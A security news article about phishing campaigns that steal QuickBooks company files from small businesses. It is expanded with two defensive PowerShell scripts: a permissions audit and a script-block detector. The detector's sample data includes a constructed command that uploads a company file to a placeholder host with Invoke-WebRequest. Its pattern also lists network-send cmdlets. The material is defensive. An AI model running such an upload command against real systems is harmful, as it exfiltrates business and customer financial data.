Cybercriminals Target QuickBooks Databases

Published: 23/11/2024   Category: security

Stolen financial files then get sold on the Dark Web, researchers say.



Cybercriminals increasingly have targeted QuickBooks file data at small and midsize businesses (SMBs) over the past few months, according to new research.
The breaches start with two types of phishing attacks to gain access to QuickBooks databases, according to findings by ThreatLocker. In the first, the attackers send a PowerShell command that runs from inside the malicious email. In the second, the attackers send a Word document via email; if the recipient opens the attached document, a macro or link within that document downloads a file onto their machine. Once the executable or PowerShell command runs, it retrieves the victim's most recently saved QuickBooks file location, points to the file share or local file, and grabs that file.
Danny Jenkins, co-founder and CEO of ThreatLocker, says the attackers usually upload the stolen files to either Google Cloud or Amazon Web Services as a temporary transfer point. From there, they sell the data on the Dark Web, where other cybercriminals buy the data to launch more targeted attacks on other QuickBooks databases or on the customers and suppliers of the victim organizations.
"They will attack every angle possible," Jenkins adds. "Cybercriminals can easily buy these QuickBooks databases on the Dark Web and launch attacks."
Meanwhile, some 43% of organizations of all sizes say they've been victims of a spear-phishing attack in the past 12 months, according to data from Barracuda Networks, and only 23% say they have dedicated spear-phishing protection in place.
"Most of the emails are invoices and resumes," ThreatLocker's Jenkins explains of the lures. "We don't have exact numbers, but we do know that millions of dollars in cybercrime is caused by these types of attacks."
Accounting programs are often written without taking security into consideration, Jenkins notes, and QuickBooks has a fundamental flaw: When an administrator runs a repair on the QuickBooks database after a system crash, all the file-share permissions can be reset, leaving the database accessible by everyone in the company. This means if hackers get into the system after a repair, they have access to all permissions — including those of the company's accountant or business manager.
"People wonder how the hackers have access to all their customer accounts, but it's really quite simple: Once they have access to the QuickBooks database, they have access to all your customers," Jenkins says. "What we're telling SMBs is to restrict permissions by user and by application. There's no reason for Microsoft Office or PowerShell to have access to QuickBooks."
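The permission reset described above is something an administrator can check for directly. The following script is an added example, not ThreatLocker's or Intuit's code: it audits the folder holding a QuickBooks company file for "Allow" entries that grant write-capable rights to broad principals such as Everyone or Authenticated Users. It assumes Windows with NTFS ACLs (Get-Acl), that the company file uses the .qbw extension, and that the share path a real deployment would pass in is a placeholder; the temporary folder at the end is constructed so the check can run without a real share.

```powershell
# Added example, not ThreatLocker's or Intuit's code: audit the folder that holds the
# QuickBooks company file (.qbw) for the over-broad NTFS permissions the article says a
# database repair can leave behind. Assumes Windows (NTFS ACLs via Get-Acl); the real
# share path is a placeholder supplied by the caller.

function Find-BroadQuickBooksAccess {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $Path,
        # Principals that should never hold write access to the company-file folder
        [string[]] $BroadPrincipals = @(
            'Everyone',
            'BUILTIN\Users',
            'NT AUTHORITY\Authenticated Users',
            'Domain Users'
        )
    )
    # Any of these rights lets a caller alter or replace the company file
    $writeRights = [int][System.Security.AccessControl.FileSystemRights]::Write -bor
                   [int][System.Security.AccessControl.FileSystemRights]::Modify -bor
                   [int][System.Security.AccessControl.FileSystemRights]::FullControl

    $acl = Get-Acl -LiteralPath $Path
    foreach ($rule in $acl.Access) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        $identity = $rule.IdentityReference.Value
        # Match with or without a domain prefix, e.g. CONTOSO\Domain Users
        $isBroad = $BroadPrincipals | Where-Object { $identity -eq $_ -or $identity -like "*\$_" }
        if (-not $isBroad) { continue }
        if (([int]$rule.FileSystemRights -band $writeRights) -ne 0) {
            [pscustomobject]@{
                Path      = $Path
                Principal = $identity
                Rights    = $rule.FileSystemRights
                Inherited = $rule.IsInherited
            }
        }
    }
}

# Demonstration on a constructed temporary folder: grant Everyone Modify (the kind of
# entry a repair can leave behind), run the audit, then clean up.
$demo = Join-Path ([System.IO.Path]::GetTempPath()) 'qb-acl-demo'
New-Item -ItemType Directory -Path $demo -Force | Out-Null
$acl  = Get-Acl -LiteralPath $demo
$rule = New-Object -TypeName System.Security.AccessControl.FileSystemAccessRule `
            -ArgumentList 'Everyone', 'Modify', 'ContainerInherit,ObjectInherit', 'None', 'Allow'
$acl.AddAccessRule($rule)
Set-Acl -LiteralPath $demo -AclObject $acl
Find-BroadQuickBooksAccess -Path $demo | Format-Table -AutoSize
Remove-Item -LiteralPath $demo -Recurse -Force

# Real use: point it at the share that holds the company file (placeholder path).
# Find-BroadQuickBooksAccess -Path '\\fileserver\QuickBooks'
```

Run against the demo folder, the function reports the Everyone entry with its Modify rights; read-only entries (ReadAndExecute) are not reported because none of the Write, Modify or FullControl bits are set. Running it after every database repair, or on a schedule, turns the reset the article describes into something that is caught the same day rather than discovered after a breach.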
ThreatLocker detailed its research in a blog post today.
Dirk Schrader, global vice president, security research at New Net Technologies, says the QuickBooks attacks are notable for their simplicity. The attackers are only using a few lines of PowerShell script and exploiting design weaknesses in a QuickBooks software application that’s often used by smaller companies, many of which lack the expertise and staffing to stay up-to-par with cybersecurity issues.
Schrader says SMBs should control whether PowerShell scripts can be executed with the current user's rights and permissions. While that might be overwhelming for some small organizations, they can instead look to secure configuration management and change control to detect the malicious file drops.
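For organizations that cannot lock down PowerShell outright, the detection side of Schrader's advice is a practical alternative. The following script is an added example, not ThreatLocker's, NNT's or the article's code: it scans PowerShell script-block text for references to a QuickBooks company file (.qbw) and raises the severity when the same block also calls a cmdlet or .NET type that sends data over the network. It assumes Script Block Logging is enabled (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log); the sample texts are constructed for the demo and are not real captures.

```powershell
# Added example, not ThreatLocker's, NNT's or the article's code: flag logged
# PowerShell script blocks that reference a QuickBooks company file (.qbw), and raise
# the severity when the same block also calls something that moves data off the host.
# Assumes Script Block Logging is on (Event ID 4104, Microsoft-Windows-PowerShell/Operational).

function Find-QuickBooksScriptActivity {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)] [string] $ScriptText,
        [string] $Source = 'sample'
    )
    process {
        # Only script blocks that name a company file are of interest
        if ($ScriptText -notmatch '(?i)\.qbw\b') { return }
        # Cmdlets and .NET types that can send a file over the network
        $sendsData = $ScriptText -match '(?i)Invoke-WebRequest|Invoke-RestMethod|Net\.WebClient|HttpClient|Start-BitsTransfer|Send-MailMessage'
        $severity  = 'Medium'
        $reason    = 'QuickBooks company file referenced by script'
        if ($sendsData) {
            $severity = 'High'
            $reason   = 'QuickBooks company file referenced together with a network send'
        }
        $collapsed = $ScriptText -replace '\s+', ' '
        [pscustomobject]@{
            Source   = $Source
            Severity = $severity
            Reason   = $reason
            Snippet  = $collapsed.Substring(0, [Math]::Min(80, $collapsed.Length))
        }
    }
}

# Constructed script-block texts: a report job (ignored), a routine local backup
# (Medium), and the pattern the article describes, a company file handed to a web
# request (High). Host and bucket names are placeholders.
$samples = @(
    'Get-ChildItem C:\Reports\*.xlsx | Copy-Item -Destination \\backup\reports',
    'Copy-Item "\\fileserver\QuickBooks\Company.qbw" -Destination D:\Backups\QuickBooks',
    'Invoke-WebRequest -Uri https://bucket.example.invalid/drop -Method Put -InFile "\\fileserver\QuickBooks\Company.qbw"'
)
$samples | Find-QuickBooksScriptActivity | Format-Table -AutoSize

# Same check over this host's recorded script blocks (needs Script Block Logging enabled)
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents 500 -ErrorAction SilentlyContinue |
    Where-Object { $_.Message } |
    ForEach-Object { Find-QuickBooksScriptActivity -ScriptText $_.Message -Source $_.TimeCreated.ToString('s') }
```

Script Block Logging is switched on through Group Policy (Administrative Templates, Windows Components, Windows PowerShell, Turn on PowerShell Script Block Logging) or by setting the EnableScriptBlockLogging DWORD to 1 under HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging. The Medium finding on the backup sample is deliberate: a legitimate backup job touching the company file is exactly the kind of baseline a change-control process records once, so that anything outside that baseline stands out.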
"Unfortunately, SMBs have to make a very first step, which is to acknowledge that a cyberattack will happen to them and that they are not too small to be of interest," Schrader says. "The interest the hackers have is to get the SMBs' information about their customers [and then] work up to the larger corporate targets — be they customers or suppliers of the SMB."
